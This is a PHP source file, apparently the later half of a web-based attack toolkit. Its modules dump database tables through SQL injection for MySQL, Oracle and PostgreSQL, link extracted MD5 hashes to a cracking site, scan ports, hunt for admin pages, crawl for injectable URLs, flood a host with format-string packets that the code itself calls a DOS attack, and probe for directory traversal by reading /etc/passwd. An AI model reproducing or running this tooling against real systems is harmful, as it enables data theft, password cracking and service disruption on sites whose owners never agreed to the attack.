	$query_datos_numero=str_replace("$payload_union","CONCAT(0x3a6f79753a,IFnull(CAST(COUNT(%2A)%20AS%20CHAR),0x20),0x3a70687a3a)",$query_datos);
	$query_datos_numero=str_replace("%23","%20FROM%20$name.$tn%23",$query_datos_numero);
	
	@$datos = "$url+$query_datos_numero";
	
	
	$i = 0;
	echo "<table>";
	while ($i < (GetBetween(file_get_contents("$datos")))):
	
	$query__data=$query_datos;
	$query__data=str_replace("$payload_union",'(SELECT%20CONCAT(0x3a6f79753a,IFnull(CAST($nombre3%20AS%20CHAR),0x20),0x3a70687a3a)%20FROM%20$name.$tn%20LIMIT%20$i,1)',$query__data);
	$query__data=str_replace('$nombre3',"$nombre3",$query__data);
	$query__data=str_replace('$name',"$name",$query__data);
	$query__data=str_replace('$tn',"$tn",$query__data);
	$query__data=str_replace('$i',"$i",$query__data);
	
	@$_data = "$url+$query__data";

	$nombre4 = GetBetween(file_get_contents("$_data"));
	if(strlen($nombre4) == 32){
		echo "<tr><td>$nombre4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$nombre4')\" style=\"color: blue\">MD5</div></td></tr>";
	}else{
		echo "<tr><td>$nombre4</td><td>";
	}
	$i++;
	endwhile;

echo "</table>";
	}
if(isset($_POST['datos']) && $_POST['datos']=='data_oc')
	{
	$url = $_POST["url"];
	$nombre3 = $_POST["nombre2"];

	$tn2 = $_POST["tn2"];
	$mode_oeb = $_POST["lol"];
	$database= $_POST["database2"];
	$query_datos=$c[$mode_oeb-1];
	$sobras=$_POST["sobras"];

	
	$query_datoss=str_replace("$payload_oracle","(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20COUNT(".$nombre3.")%20FROM%20".$database.".".$tn2.")%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))",$query_datos);
	@$datos = $url.$query_datoss.$sobras;
	
	$query_datos_n=$query_datos;
	$query_datos_n=str_replace("$payload_oracle",'(REPLACE(REPLACE(REPLACE(REPLACE((SELECT%20NVL(CAST($nombre3%20AS%20VARCHAR(4000))%2CCHR(32))%20FROM%20(SELECT%20$nombre3%2CROWNUM%20AS%20LIMIT%20FROM%20$database.$tn2%20ORDER%20BY%201%20ASC)%20WHERE%20LIMIT%3D$i)%2CCHR(32)%2CCHR(58)||CHR(121)||CHR(58))%2CCHR(36)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(64)%2CCHR(58)||CHR(109)||CHR(58))%2CCHR(35)%2CCHR(58)||CHR(102)||CHR(58)))',$query_datos_n);
	
	$i = 1;
	echo "<table>";
	while ($i < (GetBetween(file_get_contents("$datos"))-1)):
	
	$query_datos_nombre=str_replace('$database',"$database",$query_datos_n);
	$query_datos_nombre=str_replace('$nombre3',"$nombre3",$query_datos_nombre);
	$query_datos_nombre=str_replace('$tn2',"$tn2",$query_datos_nombre);
	$query_datos_nombre=str_replace('$i',"$i",$query_datos_nombre);
	
	@$_data = $url.$query_datos_nombre.$sobras;

	$nombre4 = GetBetween(str_replace(":y:"," ",file_get_contents("$_data")));
	if(strlen($nombre4) == 32){
	echo "<tr><td>$nombre4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$nombre4')\" style=\"color: blue\">MD5</div></td></tr>";
	}else{
	echo "<tr><td><!-- $_data !-->$nombre4</td><td>";
	}
		$i++;
	endwhile;

echo "</table>";
}
if(isset($_POST['datos']) && $_POST['datos']=='data_pg')
	{
	$url = $_POST["url"];
	$nombre3 = $_POST["nombre2"];
	$tn2 = $_POST["tn2"];
	$mode_pg = $_POST["lol"];

	$query_datos=$d[$mode_pg-1];
	$sobras=$_POST["sobras"];


	$query_datoss=str_replace("$payload_postgre","(SELECT%20COALESCE(CAST(COUNT(%2A)%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.".$tn2.")",$query_datos);
	$datos = $url.$query_datoss.$sobras;
	
	$query_datos_n=$query_datos;

	$query_datos_n=str_replace("$payload_postgre",'(SELECT%20COALESCE(CAST($nombre3%20AS%20CHARACTER(10000)),(CHR(32)))%20FROM%20public.$tn2%20OFFSET%20$i%20LIMIT%201)',$query_datos_n);

	$i = 0;
	echo "<table>";
	while ($i < (GetBetween(file_get_contents("$datos")))):
		$query_datos_nombre=str_replace('$nombre3',"$nombre3",$query_datos_n);
	$query_datos_nombre=str_replace('$tn2',"$tn2",$query_datos_nombre);
	$query_datos_nombre=str_replace('$i',"$i",$query_datos_nombre);
	
	$_data = $url.$query_datos_nombre.$sobras;

	$nombre4 = GetBetween(file_get_contents("$_data"));
	if(strlen($nombre4) == 32){
	echo "<tr><td>$nombre4</td><td><div OnClick=\"window.open('http://www.hashchecker.de/$nombre4')\" style=\"color: blue\">MD5</div></td></tr>";
	}else{
	echo "<tr><td>$nombre4</td><td>";
	}
		$i++;
	endwhile;

echo "</table>";
}

}
function frame5(){
frameset();
}
///////PHPsic ends------------------------------------------------------------
///////PHPsvc starts------------------------------------------------------------
function PHPsvc(){
html_header();
echo " 
<body>\n
<div align=left><h1>PHPsvc</h1> <br></div><br>
<br>Just paste the server IP/Address (in http://x.x.x.x or http://www.example.com format)<br><br>
<form action=\"".$_SERVER['PHP_SELF']."?frame=9\" method=\"post\" name=\"forma\" id=\"forma\">
url: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://\"/>
<input type=\"submit\" name=\"forma\" id=\"form\" value=\"search\"/><br>
</form> 
";
if(isset($_POST['forma']) && $_POST['forma']=='search')
{
$url = $_POST['url'];

function GetBetween2($content, $start, $end){
    $r = explode($start, $content);
    if (isset($r[1])){
        $r = explode($end, $r[1]);
        return $r[0];
  }
  return'';
}
function get_server_info2($theURL) {
    $headers = get_headers($theURL,1);
	echo "Host: $theURL<br>";
	echo "Server: ".@$headers['Server']."<br>";	
	echo "Powered-By: ".@$headers['X-Powered-By']."<br>";	
	echo "Connection: ".@$headers['Connection']."<br>";	
//--------------------------------------Web Server Specific Vulnerabilities start---------------------------	
/////////////////////////////////////////////////////////////////////////////////////////////////////		
	if(@$headers['Server'] != null){ //APACHE
		if(strpos($headers['Server'], "Apache")==true){
		$a = @GetBetween2($headers['Server'], "Apache/", " ");
		$b = @str_replace(".", "", $a);
		
		if(strpos($headers['Server'], "mod_frontpage")==true){
		$a = @GetBetween2($headers['Server'], "mod_frontpage/", " ");
		$b = @str_replace(".", "", $a);	
		if ($b  < "116"){
			echo "<br><font color=red>Apache mod_frontpage module vulnerability</font><div OnClick=\"window.open('http://www.securityfocus.com/bid/4251/info')\" style=\"color: blue\">Reference</div>";
		}
	}
		if (strpos($headers['Server'], "mod_isapi")==true){
			$a = @GetBetween2($headers['Server'], "Apache/", " ");
			$b = @str_replace(".", "", $a);
		if ($b < "2214"){
			echo "<br><font color=red>Apache 2.2.14 mod_isapi Dangling Pointer</font><div OnClick=\"window.open('http://www.senseofsecurity.com.au/advisories/SOS-10-002')\" style=\"color: blue\">Reference</div>";
}
}
		if(strpos($headers['Server'], "mod_negotiation")==true){
		echo "<br><font color=red>Apache mod_negotiation module vulnerability</font><div OnClick=\"window.open('http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0455')\" style=\"color: blue\">Reference</div>";
		echo "<br><font color=red>Apache mod_negotiation filename bruteforcing</font>";
		}
			if(strpos($headers['Server'], "mod_proxy")==true){
		echo "<br><font color=red>Apache module mod_proxy</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_22.html')\" style=\"color: blue\">Reference</div>";
		}
						if (strpos($headers['Server'], "Microsoft-IIS")==true){
			$a = @GetBetween2($headers['Server'], "Microsoft-IIS/", " ");
			$b = @str_replace(".", "", $a);
		if (($b == "50") || ($b == "51")){
			echo "<br><font color=red>Microsoft IIS5 NTLM and Basic authentication bypass</font><div OnClick=\"window.open('http://packetstormsecurity.org/files/cve/CVE-2007-2815')\" style=\"color: blue\">Reference</div>";
		}}
		
		if(strlen($b) == 4){
		 if ($c  < "2210"){$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.2.10</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_22.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2063"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.63</font> <div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2061"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.61</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2065"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.65</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2049"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.49</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2048"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.48</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2047"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.47</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2046"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.46</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2045"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.41</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2043"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.0.43</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "1341"){ $server_vulenerable = 1;echo "<br><font color=red>Apache version older than 1.3.41</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "2051"){ $server_vulenerable = 1;echo "<br><font color=red>Apache 2.x version older than 2.0.51</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_20.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "1333"){ $server_vulenerable = 1;echo "<br><font color=red>Apache version up to 1.3.33 htpasswd local overflow</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
	}
	}elseif(strlen($b) == 3){
		$c = $b;
		 if ($c  < "229"){$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.2.9.x</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "228"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.2.8.x</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "226"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.2.6.x</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
		}if ($c  < "223"){	$server_vulenerable = 1;echo "<br><font color=red>Apache version older than 2.2.3.x</font><div OnClick=\"window.open('http://httpd.apache.org/security/vulnerabilities_13.html')\" style=\"color: blue\">Reference</div>";
		}	
		}
	}
		if (@$server_vulenerable != 1){echo "<br>No server vulnerabilities detected";}
	}//APACHE end
	
///////////////////////////////////////////////////////////////////////////////////////////////////
//--------------------------------------Web Server Specific Vulnerabilities end---------------------------	
//	
//--------------------------------------PHP Specific Vulnerabilities start---------------------------	
/////////////////////////////////////////////////////////////////////////////////////////////////////	
//--Version VUlnerabilities------------------------------------------------------------------------
	if(@$headers['X-Powered-By'] != null){
		$a = @GetBetween2($headers['X-Powered-By'], "PHP/", " ");
		$b = @str_replace(".", "", $a);
		$c = $b;
		
		if ($c  == "550"){$php_vulenerable = 1;echo "<br><font color=red>PHP Safedir Restriction Bypass Vulnerabilities</font><div OnClick=\"window.open('http://www.securityfocus.com/bid/15119/info')\" style=\"color: blue\">Reference</div>";
		}if ($c < "530"){$php_vulenerable = 1;echo "<br><font color=red>PHP multipart/form-data denial of service</font><div OnClick=\"window.open('http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4017')\" style=\"color: blue\">Reference</div>";
		}if ($c < "528"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 5.2.8</font> <div OnClick=\"window.open('http://www.php.net/releases/5_2_8.php')\" style=\"color: blue\">Reference</div>";
		}if ($c < "526"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 5.2.6</font> <div OnClick=\"window.open('http://www.php.net/releases/5_2_6.php')\" style=\"color: blue\">Reference</div>";
		}if ($c < "525"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 5.2.5</font> <div OnClick=\"window.open('http://www.php.net/releases/5_2_5.php')\" style=\"color: blue\">Reference</div>";
		}if ($c < "523"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 5.2.3</font> <div OnClick=\"window.open('http://www.php.net/releases/5_2_3.php')\" style=\"color: blue\">Reference</div>";
		}if ($c < "521"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 5.2.1</font> <div OnClick=\"window.open('http://www.php.net/releases/5_2_1.php')\" style=\"color: blue\">Reference</div>";
		}if ($c < "441"){$php_vulenerable = 1;echo "<br><font color=red>PHP version older than 4.4.1</font> <div OnClick=\"window.open('http://www.php.net/releases/4_4_1.php')\" style=\"color: blue\">Reference</div>";
		}if (($c < "4.3.9") || ($c  < "5.0.2")){$php_vulenerable = 1;echo "<br><font color=orange>PHP multiple vulnerabilities<div OnClick=\"window.open('http://www.cvedetails.com/vulnerability-list/vendor_id-74/product_id-128/version_id-15947/PHP-PHP-5.0.2.html')\" style=\"color: blue\">Reference</div></font>";
		}if (($c < "438") || ($c == "5.0.1")){$php_vulenerable = 1;echo "<br><font color=orange>PHP unspecified remote arbitrary file upload vulnerability</font><div OnClick=\"window.open('http://www.securityfocus.com/bid/11190/')\" style=\"color: blue\">Reference</div>";
		}if ($c < "438"){$php_vulenerable = 1;echo "<br><font color=orange>PHP version older than 4.3.8</font> <div OnClick=\"window.open('http://www.php.net/releases/4_3_8.php')\" style=\"color: blue\">Reference</div>";
		}if (($c < "432") || ($c  == "432" )){$php_vulenerable = 1;echo "<br><font color=orange>PHP4 multiple vulnerabilities</font>";
		}if ($c < "431"){$php_vulenerable = 1;echo "<br><font color=orange>PHP socket_iovec_alloc() integer overflow</font>";
		}if (($c == "430") || ($c == "431") || ($c == "432")){$php_vulenerable = 1;echo "<br><font color=orange>PHP undefined Safe_Mode_Include_Dir safemode bypass vulnerability</font>";
		}if ($c == "430"){$php_vulenerable = 1;echo "<br><font color=orange>PHP 4.3.0 file disclosure and possible code execution</font>";
		}if ($c < "422"){$php_vulenerable = 1;echo "<br><font color=orange>PHP mail function ASCII control character header spoofing vulnerability</font>";
		}if (($c == "420") || ($c == "421")){$php_vulenerable = 1;echo "<br><font color=orange>PHP HTTP POST incorrect MIME header parsing vulnerability</font>";
		}if (($c == "400") || ($c  == "300")){$php_vulenerable = 1;echo "<br><font color=orange>PHP error logging format string vulnerability</font>";
		}if (($c == "444") || ($c  == "516")){$php_vulenerable = 1;echo "<br><font color=orange>PHP HTML Entity Encoder Heap Overflow Vulnerability</font>";
		}if ($c < "411"){$php_vulenerable = 1;echo "<br><font color=orange>PHP multiple vulnerabilities</font>";
		}

	}
	if (@$php_vulenerable != 1){echo "<br>No PHP vulnerabilities detected";}
///////////////////////////////////////////////////////////////////////////////////////////////////
//--------------------------------------PHP Specific Vulnerabilities end---------------------------	
}

	
echo get_server_info2($url);
}

}
///////PHPsvc ends--------------------------------------------------------------
///////PHPps starts--------------------------------------------------------------
function PHPps_frame(){
global $action;
	html_header();

echo "<body>\n
<div align=left><h1>PHPps</h1></div><br><br>
<br>Paste the server IP/Address (in x.x.x.x or www.example.com format) and the port range.<br><br> <br> 
<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=10\" method=\"post\" name=\"ports\" id=\"ports\">
IP/Host: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" /><br>
Port Range: <input type=\"text\" name=\"primero\" id=\"primero\" size=\"15\"/><input type=\"text\" name=\"ultimo\" id=\"ultimo\" size=\"15\"/>
<input type=\"submit\" name=\"ports\" id=\"ports\" value=\"scan\"/><br>
</form> 
";
if(isset($_POST['ports']) && $_POST['ports']=='scan')
	{
	$url = $_POST['url'];
	$primero = $_POST['primero'];
	$ultim = ($_POST['ultimo']+1);
	
	
	for($port = $primero; $port != $ultim; $port++)
		{   
		$conect =  @fsockopen ($url, $port, $errno, $errstr, 5);   
		if($conect)
		{
			echo("Port " . $port ." is  <font color='green'>open</font><br/>");
			fclose($conect);
			unset($conect);
		}else{
		}
	flush();
	}

  



}
echo "</body>\n</html>";	
}
///////PHPps ends--------------------------------------------------------------
///////PHPapf starts--------------------------------------------------------------
function PHPapf_frame(){
global $action,$ap;
	html_header();
	
echo "<body>\n
<div align=left><h1>PHPapf</h1></div><br><br>
<br>Thing is simple, just enter the url (http://www.example.com/) and WAIT.<br><br><br> 
<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=11\" method=\"post\" name=\"ports\" id=\"ports\">
URL: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://\"/>    <input type=\"submit\" name=\"ports\" id=\"ports\" value=\"scan\"/><br>
</form> 
";
if(isset($_POST['ports']) && $_POST['ports']=='scan')
	{
$url = $_POST['url'];


function get_http_response_code($theURL) {
    $headers = get_headers($theURL);
    $status = substr($headers[0], 9, 3);
	$p = parse_url( $theURL );
    $host = explode(':', $p['host']);
    $hostname = $host[0]; 
    if($status == 200 || $status == 403 || $status == "" ){
    echo "found $theURL<br>"; 
    }elseif($status == 500){
	print "<td><font color=\"red\">($status)INTERNAL SERVER ERROR</font></td><td><a href=\"$theURL\">CHECK</a></td></tr>";
	
    }else
	{
		
    
}
}

foreach ($ap as $url2){
	$url3 = "$url$url2";
@get_http_response_code("$url3");

}
}
echo "</body>\n</html>";	
}
///////PHPapf ends------------------------------------------------------------
///////PHPswc ends------------------------------------------------------------
function phpswc_frame(){
	global $action;
	html_header();
	ini_set('memory_limit', '-1');
echo "<body>\n
<div align=left><h1>PHPswc</h1></div><br><br>
<br>Enter the url (http://www.example.com WITHOUT A FINAL /) and WAIT A LOT (like 2 mins or so).<br>
This will give some possible vulnerable urls like http://www.example.com?vuln=erability<br><br><br> 
<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=12\" method=\"post\" name=\"crawl\" id=\"crawl\">
URL: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://\"/> <br>
Max. level 2 links to crawl: <input type=\"text\" name=\"links\" id=\"links\" size=\"35\" value=\"50\"/> <input type=\"submit\" name=\"crawl\" id=\"crawl\" value=\"crawl\"/><br>
(According to... myself, 50 is a cool max. number)
<br>
</form> 
";
if(isset($_POST['crawl']) && $_POST['crawl']=='crawl')
	{
		function getTime() 
    { 
    $a = explode (' ',microtime()); 
    return(double) $a[0] + $a[1]; 
    } 
		
		$Start = getTime(); 


		$link_to_dig = $_POST['url'];
		$maxlinks = $_POST['links'];
  $original_file = @file_get_contents($link_to_dig);
  $path_info = parse_url($link_to_dig);
  $base = $path_info['scheme'] . "://" . $path_info['host'];
  
  $stripped_file = strip_tags($original_file, "<a>");
  $fixed_file = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base}/", $stripped_file);
  $fixed_file = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$link_to_dig}/?", $fixed_file);
  preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file, $matches);
  
  $result = $matches[1];
  $result = str_replace("<", "&lt;", $result);
  $p = parse_url($link_to_dig);
  $host = $p['host'] ;
   foreach($result as $sresult){

	  if(((strpos($sresult, "facebook"))) == false && ((strpos($sresult, "javascript"))) == false && ((strpos($sresult, "twitter"))) == false && ((strpos($sresult, "youtube"))) == false){
	  $items[] = $sresult;
	
  }
}
   
  $result = array_unique($items);
  foreach($result as $checker){
	$checker = str_replace( " " ,"", $checker );
  if(strpos($checker, "://") == NULL){
	  $final[] = "http://".$host."/$checker";

  }elseif(strpos($checker, $host) == FALSE){
  }else{
	  $final[] = $checker;
  }}
     $maxlonks = "0";
  foreach($final as $echo){
	  $maxlonks++;
	  if($maxlonks >= $maxlinks){
		 break;
	 }
	   $original_file2 = @file_get_contents($echo); 
  $path_info2 = parse_url($echo);
  $base2 = $path_info2['scheme'] . "://" . $path_info2['host'];
  $stripped_file2 = strip_tags($original_file2, "<a>");
  $fixed_file2 = preg_replace("/<a([^>]*)href=\"\//is", "<a$1href=\"{$base2}/", $stripped_file2);
  $fixed_file2 = preg_replace("/<a([^>]*)href=\"\?/is", "<a$1href=\"{$echo}/?", $fixed_file2);
  preg_match_all("/<a(?:[^>]*)href=\"([^\"]*)\"(?:[^>]*)>(?:[^<]*)<\/a>/is", $fixed_file2, $matches2);
  $result2 = $matches2[1];
  $result2 = str_replace("<", "&lt;", $result2);
  $p2 = parse_url($echo);
  $host2 = $p2['host'] ;
	foreach($result2 as $sresult2){
	if(((strpos($sresult2, "php?")))==true && ((strpos($sresult2, "facebook"))) == false && ((strpos($sresult2, "javascript"))) == false && ((strpos($sresult2, "twitter"))) == false && ((strpos($sresult2, "youtube"))) == false){
	  $items2[] = $sresult2;
	
  }
}
 }
 $resultados = array_unique($items2);
  
  foreach($resultados as $checker2){
	  $checker2 = str_replace( " " ,"", $checker2 );
  if(strpos($checker2, "://") == NULL){
	  $final2[] = "http://".$host."/$checker2";

  }elseif(strpos($checker2, $host2) == FALSE){
  }else{
	  $final2[] = $checker2;
  }
  }
  }

$uniques = array_unique(array_merge($final, $final2));

foreach($uniques as $quizas){
	  if(((strpos($quizas, "?"))) == true && ((strpos($quizas, "facebook"))) == false && ((strpos($quizas, "javascript"))) == false && ((strpos($quizas, "twitter"))) == false && ((strpos($quizas, "youtube"))) == false){
	  $items[] = $quizas;
	  echo "$quizas<br>";
	}

}$End = getTime(); echo "Time taken = ".number_format(($End - $Start),2)." secs"; 

	}
///////PHPswc ends------------------------------------------------------------
//////PHPfzz
function PHPfuz_frame(){
	global $action;
	html_header();
	
echo "
<body>\n
<div align=left><h1>PHPssf</h1></div><br><br>
<br>1.- Enter Host/IP:port<br>2.- Click GO<br>3.- ?????<br>4.- PROFIT!!<br><br>

<form method=\"POST\" name=\"fuzz\" action=\"".$_SERVER['PHP_SELF']."?frame=13\">
<input type=\"hidden\" name=\"fuzz\" />
<input type=\"hidden\" name=\"type\"value=\"tcp\" />
Host/IP: <input class=\"cmd\" name=\"ip\" value=\"127.0.0.1\" />   
Port: <input class=\"cmd\" name=\"port\" value=\"80\" /><br>
Timeout: <input type=\"text\" class=\"cmd\" name=\"time\" value=\"5\"/>
Packages to send: <input type=\"text\" class=\"cmd\" name=\"times\" value=\"100\" /><br>
Message: <font color=\"red\">(The message MUST be long)</font>
<input class=\"cmd\" name=\"message\" value=\"%S%x--Some Garbage here--%x%S\" />
Times to repeat message: <input style=\"width: 30px;\" class=\"cmd\" name=\"Multiplier\" value=\"10\" /><br>
<input type=\"submit\" class=\"own\" value=\"GO\" name=\"fuzz\"/>
</form>";

	
	
	if(isset($_POST['fuzz']) && $_POST['fuzz']=='GO')
	{
	    if(isset($_POST['ip']) &&
    isset($_POST['port']) &&
    isset($_POST['times']) &&
    isset($_POST['time']) &&
    isset($_POST['message']) &&
    isset($_POST['Multiplier']) &&
    $_POST['message'] != "" &&
    $_POST['time'] != "" &&
    $_POST['times'] != "" &&
    $_POST['port'] != "" &&
    $_POST['ip'] != "" &&
    $_POST['Multiplier'] != ""
    )
    {
       $IP=$_POST['ip'];
	   $port=$_POST['port'];
       $times = $_POST['times'];
	   $timeout = $_POST['time'];
	   $send = 0;
       $ending = "";
       $multiplier = $_POST['Multiplier'];
       $data = "";
       $mode="tcp";
       $data .= "POST /";
       $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
        if($_POST['type'] == "tcp")
        {
            $mode = "tcp";
        }
        while($multiplier--)
        {
            $data .= urlencode($_POST['message']);
        }
        $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
        $data .= "server beign fuzzed, resistance is futile!".$ending;
        $length = strlen($data);
	   for($i=0;$i<$times;$i++)
	   {
            $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
            if($socket)
            {
                fwrite($socket , $data , $length );
                fclose($socket);
            }
        }
        echo "Fuzzing Completed!<br>	";
        echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
        echo "Total Number of Packets Sent : " . $times . "<br />";
    }
}
}
/////PHPfuz end
/////PHPdt
function PHPdt_frame(){
global $action,$dt;
	html_header();
	
echo "<body>\n
<div align=left><h1>PHPdt</h1></div><br><br>
<br>Thing is simple, just enter the url (http://www.example.com/lol.php?file=some/shit.php) and WAIT.<br><br><br> 
<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=14\" method=\"post\" name=\"ports\" id=\"ports\">
URL: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://\"/>    <input type=\"submit\" name=\"ports\" id=\"ports\" value=\"scan\"/><br>
</form> 
";
if(isset($_POST['ports']) && $_POST['ports']=='scan')
	{
$url = $_POST['url'];

$a=explode("=",$url);
$b=0;
while(count($a)-2 >= $b){

@$c.="$a[$b]=";

$b++;
}
echo "<br><br><br>";
foreach ($dt as $url2){
$traversal = "$c$url2";
$resultadox=@file_get_contents($traversal);
if (strpos($resultadox,"root:x:0:0:root:/root")){
	echo "<font color=red>Directory Traversal found:</font> ".$traversal."<br>";
	
   $status="1";	
	die();
}

}
if(@$status !== "1"){echo "NOTHING TO DO HERE...";}
}
echo "</body>\n</html>";	
}
///////PHPdt starts--------------------------------------------------------------
///////PHPjvs starts--------------------------------------------------------------
function PHPjvs_frame(){
global $action,$jvs;
	html_header();
	
echo "<body>\n
<div align=left><h1>PHPjvs</h1></div><br><br>
<br>This is just a \"test\" module based in response codes SO it may work, it may not work or it may make you a sandwich.<br><br><br> 
<table><tr><td>
<form action=\"".$_SERVER['PHP_SELF']."?frame=15\" method=\"post\" name=\"ports\" id=\"ports\">
URL: <input type=\"text\" name=\"url\" id=\"url\" size=\"65\" value=\"http://www.target.com/\"/>    <input type=\"submit\" name=\"ports\" id=\"ports\" value=\"scan\"/><br>
</form> 
";
if(isset($_POST['ports']) && $_POST['ports']=='scan')
	{
$url = $_POST['url'];


function get_http_response_code($theURL) {
    $headers = get_headers($theURL);
    $status = substr($headers[0], 9, 3);
	$p = parse_url( $theURL );
    $host = explode(':', $p['host']);
    $hostname = $host[0]; 
    if($status == 200 || $status == 403 || $status == "" ){
    echo "found $theURL<br>"; 
    }elseif($status == 500){
	print "<td><font color=\"red\">($status)INTERNAL SERVER ERROR</font></td><td><a href=\"$theURL\">CHECK</a></td></tr>";
	
    }else
	{
		
    
}
}

foreach ($jvs as $url2){
	$url3 = "$url$url2";
@get_http_response_code("$url3");

}
}
echo "</body>\n</html>";	
}
///////PHPjvs ends------------------------------------------------------------
echo "</body>";
?>
